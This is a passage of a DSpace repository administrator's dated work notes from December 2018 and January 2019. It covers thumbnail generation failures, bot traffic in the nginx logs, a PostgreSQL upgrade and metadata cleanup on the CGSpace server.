    • Eighteen items had en||fr for the language, but the content was only in French so changed them to just fr
    • +
    • Six items had encoding errors in French text so I will ask Bosede to re-do them carefully
    • +
    • Correct and normalize a few AGROVOC subjects
    • +
    +
  • +
  • Expand my “encoding error” detection GREL to include ~ as I saw a lot of that in some copy pasted French text recently:
  • +
+
or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/)),
+  isNotNull(value.match(/.*\u007e.*/))
+)
+

2018-12-03

+
    +
  • I looked at the DSpace Ghostscript issue more and it seems to only affect certain PDFs…
  • +
  • I can successfully generate a thumbnail for another recent item (10568/98394), but not for 10568/98930
  • +
  • Even manually on my Arch Linux desktop with ghostscript 9.26-1 and the pngalpha device, I can generate a thumbnail for the first one (10568/98394):
  • +
+
$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf
+
    +
  • So it seems to be something about the PDFs themselves, perhaps related to alpha support?
  • +
  • The first item (10568/98394) has the following information:
  • +
+
$ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
+Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf[0]=>Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf PDF 595x841 595x841+0+0 16-bit sRGB 107443B 0.000u 0:00.000
+identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
+
    +
  • And wow, I can’t even run ImageMagick’s identify on the first page of the second item (10568/98930):
  • +
+
$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+zsh: abort (core dumped)  identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+
    +
  • But with GraphicsMagick’s identify it works:
  • +
+
$ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+DEBUG: FC_WEIGHT didn't match
+Food safety Kenya fruits.pdf PDF 612x792+0+0 DirectClass 8-bit 1.4Mi 0.000u 0m:0.000002s
+
+
$ identify Food\ safety\ Kenya\ fruits.pdf
+Food safety Kenya fruits.pdf[0] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+Food safety Kenya fruits.pdf[1] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+Food safety Kenya fruits.pdf[2] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+Food safety Kenya fruits.pdf[3] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+Food safety Kenya fruits.pdf[4] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
+identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
+
    +
  • As I expected, ImageMagick cannot generate a thumbnail, but GraphicsMagick can (though it looks like crap):
  • +
+
$ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
+zsh: abort (core dumped)  convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten
+$ gm convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
+DEBUG: FC_WEIGHT didn't match
+
    +
  • I inspected the troublesome PDF using jhove and noticed that it is using ISO PDF/A-1, Level B and the other one doesn’t list a profile, though I don’t think this is relevant
  • +
  • I found another item that fails when generating a thumbnail (10568/98391); DSpace complains:
  • +
+
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+        at org.im4java.core.Info.getBaseInfo(Info.java:360)
+        at org.im4java.core.Info.<init>(Info.java:151)
+        at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
+        at org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.getDestinationStream(ImageMagickPdfThumbnailFilter.java:24)
+        at org.dspace.app.mediafilter.FormatFilter.processBitstream(FormatFilter.java:170)
+        at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:475)
+        at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:429)
+        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:401)
+        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:237)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+        at org.im4java.core.ImageCommand.run(ImageCommand.java:219)
+        at org.im4java.core.Info.getBaseInfo(Info.java:342)
+        ... 14 more
+Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
+        at org.im4java.core.ImageCommand.finished(ImageCommand.java:253)
+        at org.im4java.process.ProcessStarter.run(ProcessStarter.java:314)
+        at org.im4java.core.ImageCommand.run(ImageCommand.java:215)
+        ... 15 more
+
    +
  • And on my Arch Linux environment ImageMagick’s convert also segfaults:
  • +
+
$ convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
+zsh: abort (core dumped)  convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\]  x60
+
    +
  • But GraphicsMagick’s convert works:
  • +
+
$ gm convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
+
    +
  • So far the only thing that stands out is that the two files that don’t work were created with Microsoft Office 2016:
  • +
+
$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
+Creator:        Microsoft® Word 2016
+Producer:       Microsoft® Word 2016
+$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
+Creator:        Microsoft® Word 2016
+Producer:       Microsoft® Word 2016
+
    +
  • And the one that works was created with Office 365:
  • +
+
$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
+Creator:        Microsoft® Word for Office 365
+Producer:       Microsoft® Word for Office 365
+
    +
  • I remembered an old technique I was using to generate thumbnails in 2015 using Inkscape followed by ImageMagick or GraphicsMagick:
  • +
+
$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
+$ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
+
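    +
  • A minimal Python sketch (just an idea, not how DSpace's media filter works) that chains the two commands above as a fallback for PDFs where ImageMagick's Ghostscript delegate fails:
  • +
+
import subprocess
+import sys
+
+def make_thumbnail(pdf_path, jpg_path, height=600):
+    # Render the first page of the PDF to a PNG with Inkscape at 72 DPI...
+    subprocess.run(['inkscape', pdf_path, '-z', '--export-dpi=72',
+                    '--export-area-drawing', '--export-png=cover.png'],
+                   check=True)
+    # ...then resize and flatten it to a JPEG thumbnail with GraphicsMagick
+    subprocess.run(['gm', 'convert', '-resize', f'x{height}', '-flatten',
+                    '-quality', '85', 'cover.png', jpg_path],
+                   check=True)
+
+if __name__ == '__main__':
+    make_thumbnail(sys.argv[1], sys.argv[2])
+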
    +
  • I’ve tried a few times this week to register for the Ethiopian eVisa website, but it is never successful
  • +
  • In the end I tried one last time to just apply without registering and it was apparently successful
  • +
  • Testing DSpace 5.8 (5_x-prod branch) in an Ubuntu 18.04 VM with Tomcat 8.5 and had some issues: +
      +
    • JSPUI shows an internal error (the log shows something about the tag cloud, though, so it might be unrelated)
    • +
    • Atmire Listings and Reports, which use JSPUI, asks you to log in again and then doesn’t work
    • +
    • Content and Usage Analysis doesn’t show up in the sidebar after logging in
    • +
    • I can navigate to /atmire/reporting-suite/usage-graph-editor, but it’s only the Atmire theme and a “page not found” message
    • +
    • Related messages from dspace.log:
    • +
    +
  • +
+
2018-12-03 15:44:00,030 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+2018-12-03 15:44:03,390 ERROR com.atmire.app.webui.servlet.ExportServlet @ Error converter plugin not found: interface org.infoCon.ConverterPlugin
+...
+2018-12-03 15:45:01,667 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-listing-and-reports not found
+
    +
  • I tested it on my local environment with Tomcat 8.5.34 and the JSPUI application still has an error (again, the logs show something about the tag cloud, so it might be unrelated), and Listings and Reports still asks you to log in again, despite already being logged in via XMLUI, but it does appear to work (I generated a report and exported a PDF)
  • +
  • I think the errors about missing Atmire components must be important; they appear here on my local machine as well (though not the one about atmire-listings-and-reports):
  • +
+
2018-12-03 16:44:00,009 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+
    +
  • This has got to be partly the Ubuntu Tomcat packaging, and partly DSpace 5.x's readiness for Tomcat 8.5…?
  • +
+

2018-12-04

+
    +
  • Last night Linode sent a message that the load on CGSpace (linode18) was too high, here’s a list of the top users at the time and throughout the day:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018:1(5|6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    225 40.77.167.142
+    226 66.249.64.63
+    232 46.101.86.248
+    285 45.5.186.2
+    333 54.70.40.11
+    411 193.29.13.85
+    476 34.218.226.147
+    962 66.249.70.27
+   1193 35.237.175.180
+   1450 2a01:4f8:140:3192::2
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1141 207.46.13.57
+   1299 197.210.168.174
+   1341 54.70.40.11
+   1429 40.77.167.142
+   1528 34.218.226.147
+   1973 66.249.70.27
+   2079 50.116.102.77
+   2494 78.46.79.71
+   3210 2a01:4f8:140:3192::2
+   4190 35.237.175.180
+
    +
  • 35.237.175.180 is known to us (CCAFS?), and I’ve already added it to the list of bot IPs in nginx, which appears to be working:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
+4772
+$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
+630
+
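    +
  • The same check can be scripted; a small Python sketch (assuming the session_id=…:ip_addr=… log format above) that counts total hits and unique Tomcat sessions for a given IP in a dspace.log file:
  • +
+
import re
+import sys
+
+def session_stats(logfile, ip):
+    # Mirror the grep/sort/uniq pipeline above: total matches vs unique session IDs
+    pattern = re.compile(r'session_id=([A-Z0-9]{32}):ip_addr=' + re.escape(ip))
+    total = 0
+    sessions = set()
+    with open(logfile) as f:
+        for line in f:
+            for match in pattern.finditer(line):
+                total += 1
+                sessions.add(match.group(1))
+    return total, len(sessions)
+
+if __name__ == '__main__':
+    # For example: python3 session_stats.py dspace.log.2018-12-03 35.237.175.180
+    total, unique = session_stats(sys.argv[1], sys.argv[2])
+    print(f'{total} hits, {unique} unique sessions')
+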
    +
  • I haven’t seen 2a01:4f8:140:3192::2 before. Its user agent is some new bot:
  • +
+
Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
+
    +
  • At least it seems the Tomcat Crawler Session Manager Valve is working to re-use the common bot XMLUI sessions:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
+5111
+$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
+419
+
    +
  • 78.46.79.71 is another host on Hetzner with the following user agent:
  • +
+
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
+
    +
  • This is not the first time a host on Hetzner has used a “normal” user agent to make thousands of requests
  • +
  • At least it is re-using its Tomcat sessions somehow:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
+2044
+$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
+1
+
    +
  • In other news, it’s good to see my re-work of the database connectivity in the dspace-statistics-api actually caused a reduction of persistent database connections (from 1 to 0, but still!):
  • +
+

PostgreSQL connections day

+

2018-12-05

+
    +
  • Discuss RSS issues with IWMI and WLE people
  • +
+

2018-12-06

+
    +
  • Linode sent a message that the CPU usage of CGSpace (linode18) is too high last night
  • +
  • I looked in the logs and there’s nothing particular going on:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1225 157.55.39.177
+   1240 207.46.13.12
+   1261 207.46.13.101
+   1411 207.46.13.157
+   1529 34.218.226.147
+   2085 50.116.102.77
+   3334 2a01:7e00::f03c:91ff:fe0a:d645
+   3733 66.249.70.27
+   3815 35.237.175.180
+   7669 54.70.40.11
+
    +
  • 54.70.40.11 is some new bot with the following user agent:
  • +
+
Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)
+
    +
  • But Tomcat is forcing them to re-use their Tomcat sessions with the Crawler Session Manager valve:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
+6980
+$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
+1156
+
    +
  • 2a01:7e00::f03c:91ff:fe0a:d645 appears to be the CKM dev server where Danny is testing harvesting via Drupal
  • +
  • It seems they are hitting the XMLUI’s OpenSearch a bit, but mostly on the REST API so no issues here yet
  • +
  • Drupal is already in the Tomcat Crawler Session Manager Valve’s regex so that’s good!
  • +
+

2018-12-10

+
    +
  • I ran into Mia Signs in Addis and we discussed Altmetric as well as RSS feeds again +
      +
    • We came up with an OpenSearch query for all items tagged with the WLE CRP subject (where the sort_by=3 parameter is the accession date, as configured in dspace.cfg)
    • +
    • About Altmetric she was wondering why some low-ranking items of theirs do not have the Handle/DOI relationship, but high-ranking ones do
    • +
    • It sounds kinda crazy, but she said when she talked to Altmetric about their Twitter harvesting they said their coverage is not perfect, so it might be some kinda prioritization thing where they only do it for popular items?
    • +
    • I am testing this by tweeting one WLE item from CGSpace that currently has no Altmetric score
    • +
    • Interestingly, after about an hour I see it has already been picked up by Altmetric and has my tweet as well as some other tweet from over a month ago…
    • +
    • I tweeted a link to the item’s DOI to see if Altmetric will notice it, hopefully associated with the Handle I tweeted earlier
    • +
    +
  • +
+

2018-12-11

+ +

2018-12-13

+
    +
  • Oh this is very interesting: WorldFish’s repository is live now
  • +
  • It’s running DSpace 5.9-SNAPSHOT on KnowledgeArc, and at least the OAI and REST interfaces are active
  • +
  • Also, I notice they ended up registering a Handle (they had been considering taking KnowledgeArc’s advice to not use Handles!)
  • +
  • Did some coordination work on the hotel bookings for the January AReS workshop in Amman
  • +
+

2018-12-17

+
    +
  • Linode alerted me twice today that the load on CGSpace (linode18) was very high
  • +
  • Looking at the nginx logs I see a few new IPs in the top 10:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "17/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    927 157.55.39.81
+    975 54.70.40.11
+   2090 50.116.102.77
+   2121 66.249.66.219
+   3811 35.237.175.180
+   4590 205.186.128.185
+   4590 70.32.83.92
+   5436 2a01:4f8:173:1e85::2
+   5438 143.233.227.216
+   6706 94.71.244.172
+
    +
  • 94.71.244.172 and 143.233.227.216 are both in Greece and use the following user agent:
  • +
+
Mozilla/3.0 (compatible; Indy Library)
+
    +
  • I see that I added this bot to the Tomcat Crawler Session Manager valve in 2017-12 so its XMLUI sessions are getting re-used
  • +
  • 2a01:4f8:173:1e85::2 is some new bot called BLEXBot/1.0 which should be matching the existing “bot” pattern in the Tomcat Crawler Session Manager regex
  • +
+

2018-12-18

+
    +
  • Open a ticket with Atmire to ask them to prepare the Metadata Quality Module for our DSpace 5.8 code
  • +
+

2018-12-19

+
    +
  • Update Atmire Listings and Reports to add the journal title (dc.source) to bibliography and update example bibliography values (#405)
  • +
+

2018-12-20

+
    +
  • Testing compression of PostgreSQL backups with xz and gzip:
  • +
+
$ time xz -c cgspace_2018-12-19.backup > cgspace_2018-12-19.backup.xz
+xz -c cgspace_2018-12-19.backup > cgspace_2018-12-19.backup.xz  48.29s user 0.19s system 99% cpu 48.579 total
+$ time gzip -c cgspace_2018-12-19.backup > cgspace_2018-12-19.backup.gz
+gzip -c cgspace_2018-12-19.backup > cgspace_2018-12-19.backup.gz  2.78s user 0.09s system 99% cpu 2.899 total
+$ ls -lh cgspace_2018-12-19.backup*
+-rw-r--r-- 1 aorth aorth 96M Dec 19 02:15 cgspace_2018-12-19.backup
+-rw-r--r-- 1 aorth aorth 94M Dec 20 11:36 cgspace_2018-12-19.backup.gz
+-rw-r--r-- 1 aorth aorth 93M Dec 20 11:35 cgspace_2018-12-19.backup.xz
+
    +
  • Looks like it’s really not worth it…
  • +
  • Peter pointed out that Discovery filters for CTA subjects on item pages were not working
  • +
  • It looks like there were some mismatches in the Discovery index names and the XMLUI configuration, so I fixed them (#406)
  • +
  • Peter asked if we could create a controlled vocabulary for publishers (dc.publisher)
  • +
  • I see we have about 3500 distinct publishers:
  • +
+
# SELECT COUNT(DISTINCT(text_value)) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=39;
+ count
+-------
+  3522
+(1 row)
+
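    +
  • A rough psycopg2 sketch (connection details are placeholders) to dump the distinct publisher values to a text file as a starting point for the controlled vocabulary:
  • +
+
import psycopg2
+
+# Same query as above, but returning the values instead of just counting them
+conn = psycopg2.connect('dbname=dspace user=dspace password=fuu host=localhost')
+cursor = conn.cursor()
+cursor.execute("""SELECT DISTINCT(text_value) FROM metadatavalue
+                  WHERE resource_type_id=2 AND metadata_field_id=39
+                  ORDER BY text_value""")
+
+with open('/tmp/publishers.txt', 'w') as f:
+    for (publisher,) in cursor.fetchall():
+        if publisher:
+            f.write(publisher + '\n')
+
+cursor.close()
+conn.close()
+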
    +
  • I reverted the metadata changes related to “Unrestricted Access” and “Restricted Access” on DSpace Test because we’re not pushing forward with the new status terms for now
  • +
  • Purge remaining Oracle Java 8 stuff from CGSpace (linode18) since we migrated to OpenJDK a few months ago:
  • +
+
# dpkg -P oracle-java8-installer oracle-java8-set-default
+
    +
  • Update usage rights on CGSpace as we agreed with Maria Garruccio and Peter last month:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
+Connected to database.
+Fixed 466 occurences of: Copyrighted; Any re-use allowed
+
    +
  • Upgrade PostgreSQL on CGSpace (linode18) from 9.5 to 9.6:
  • +
+
# apt install postgresql-9.6 postgresql-client-9.6 postgresql-contrib-9.6 postgresql-server-dev-9.6
+# pg_ctlcluster 9.5 main stop
+# tar -cvzpf var-lib-postgresql-9.5.tar.gz /var/lib/postgresql/9.5
+# tar -cvzpf etc-postgresql-9.5.tar.gz /etc/postgresql/9.5
+# pg_ctlcluster 9.6 main stop
+# pg_dropcluster 9.6 main
+# pg_upgradecluster 9.5 main
+# pg_dropcluster 9.5 main
+# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r
+
    +
  • I’ve been running PostgreSQL 9.6 for months on my local development and public DSpace Test (linode19) environments
  • +
  • Run all system updates on CGSpace (linode18) and restart the server
  • +
  • Try to run the DSpace cleanup script on CGSpace (linode18), but I get some errors about foreign key constraints:
  • +
+
$ dspace cleanup -v
+ - Deleting bitstream information (ID: 158227)
+ - Deleting bitstream record from database (ID: 158227)
+Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(158227) is still referenced from table "bundle".
+...
+
    +
  • As always, the solution is to manually clear those primary bitstream IDs in PostgreSQL:
  • +
+
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
+UPDATE 1
+
    +
  • After all that I started a full Discovery reindex to get the index name changes and rights updates
  • +
+

2018-12-29

+
    +
  • CGSpace went down today for a few minutes while I was at dinner and I quickly restarted Tomcat
  • +
  • The top IP addresses as of this evening are:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    963 40.77.167.152
+    987 35.237.175.180
+   1062 40.77.167.55
+   1464 66.249.66.223
+   1660 34.218.226.147
+   1801 70.32.83.92
+   2005 50.116.102.77
+   3218 66.249.66.219
+   4608 205.186.128.185
+   5585 54.70.40.11
+
    +
  • And just around the time of the alert:
  • +
+
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E "29/Dec/2018:1(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    115 66.249.66.223
+    118 207.46.13.14
+    123 34.218.226.147
+    133 95.108.181.88
+    137 35.237.175.180
+    164 66.249.66.219
+    260 157.55.39.59
+    291 40.77.167.55
+    312 207.46.13.129
+   1253 54.70.40.11
+
    +
  • All these look ok (54.70.40.11 is known to us from earlier this month and should be reusing its Tomcat sessions)
  • +
  • So I’m not sure what was going on last night…
  • +

January, 2019

+ +
+

2019-01-02

+
    +
  • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
  • +
  • I don’t see anything interesting in the web server logs around that time though:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+
    +
  • Analyzing the types of requests made by the top few IPs during that time:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 54.70.40.11 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
+     30 bitstream
+    534 discover
+    352 handle
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 207.46.13.1 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
+    194 bitstream
+    345 handle
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 46.101.86.248 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
+    261 handle
+
    +
  • It’s not clear to me what was causing the outbound traffic spike
  • +
  • Oh nice! The once-per-year cron job for rotating the Solr statistics actually worked now (for the first time ever!):
  • +
+
Moving: 81742 into core statistics-2010
+Moving: 1837285 into core statistics-2011
+Moving: 3764612 into core statistics-2012
+Moving: 4557946 into core statistics-2013
+Moving: 5483684 into core statistics-2014
+Moving: 2941736 into core statistics-2015
+Moving: 5926070 into core statistics-2016
+Moving: 10562554 into core statistics-2017
+Moving: 18497180 into core statistics-2018
+
    +
  • This could be why the outbound traffic rate was high, due to the S3 backup that runs at 3:30AM…
  • +
  • Run all system updates on DSpace Test (linode19) and reboot the server
  • +
+

2019-01-03

+
    +
  • Update local Docker image for DSpace PostgreSQL, re-using the existing data volume:
  • +
+
$ sudo docker pull postgres:9.6-alpine
+$ sudo docker rm dspacedb
+$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+
    +
  • Testing DSpace 5.9 with Tomcat 8.5.37 on my local machine and I see that Atmire’s Listings and Reports still doesn’t work +
      +
    • After logging in via XMLUI and clicking the Listings and Reports link from the sidebar it redirects me to a JSPUI login page
    • +
    • If I log in again there the Listings and Reports work… hmm.
    • +
    +
  • +
  • The JSPUI application—which Listings and Reports depends upon—also does not load, though the error is perhaps unrelated:
  • +
+
2019-01-03 14:45:21,727 INFO  org.dspace.browse.BrowseEngine @ anonymous:session_id=9471D72242DAA05BCC87734FE3C66EA6:ip_addr=127.0.0.1:browse_mini:
+2019-01-03 14:45:21,971 INFO  org.dspace.app.webui.discovery.DiscoverUtility @ facets for scope, null: 23
+2019-01-03 14:45:22,115 WARN  org.dspace.app.webui.servlet.InternalErrorServlet @ :session_id=9471D72242DAA05BCC87734FE3C66EA6:internal_error:-- URL Was: http://localhost:8080/jspui/internal-error
+-- Method: GET
+-- Parameters were:
+
+org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discovery/static-tagcloud-facet.jsp (line: [57], column: [8]) No tag [tagcloud] defined in tag library imported with prefix [dspace]
+    at org.apache.jasper.compiler.DefaultErrorHandler.jspError(DefaultErrorHandler.java:41)
+    at org.apache.jasper.compiler.ErrorDispatcher.dispatch(ErrorDispatcher.java:291)
+    at org.apache.jasper.compiler.ErrorDispatcher.jspError(ErrorDispatcher.java:97)
+    at org.apache.jasper.compiler.Parser.processIncludeDirective(Parser.java:347)
+    at org.apache.jasper.compiler.Parser.parseIncludeDirective(Parser.java:380)
+    at org.apache.jasper.compiler.Parser.parseDirective(Parser.java:481)
+    at org.apache.jasper.compiler.Parser.parseElements(Parser.java:1445)
+    at org.apache.jasper.compiler.Parser.parseBody(Parser.java:1683)
+    at org.apache.jasper.compiler.Parser.parseOptionalBody(Parser.java:1016)
+    at org.apache.jasper.compiler.Parser.parseCustomTag(Parser.java:1291)
+    at org.apache.jasper.compiler.Parser.parseElements(Parser.java:1470)
+    at org.apache.jasper.compiler.Parser.parse(Parser.java:144)
+    at org.apache.jasper.compiler.ParserController.doParse(ParserController.java:244)
+    at org.apache.jasper.compiler.ParserController.parse(ParserController.java:105)
+    at org.apache.jasper.compiler.Compiler.generateJava(Compiler.java:202)
+    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:373)
+    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:350)
+    at org.apache.jasper.compiler.Compiler.compile(Compiler.java:334)
